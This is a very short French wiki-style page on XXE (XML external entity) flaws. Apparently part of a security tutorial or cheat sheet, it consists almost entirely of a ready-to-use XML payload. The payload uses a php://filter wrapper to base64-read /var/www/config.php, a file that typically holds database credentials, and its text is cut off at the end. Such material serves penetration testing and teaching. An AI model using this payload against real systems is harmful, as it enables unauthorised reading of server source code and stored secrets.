1.9 Failles XXE
Aller à la navigation
Aller à la recherche
Lire du code PHP avec une faille XXE
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/config.php" > ]> <results> <result>&harmless;</result> </results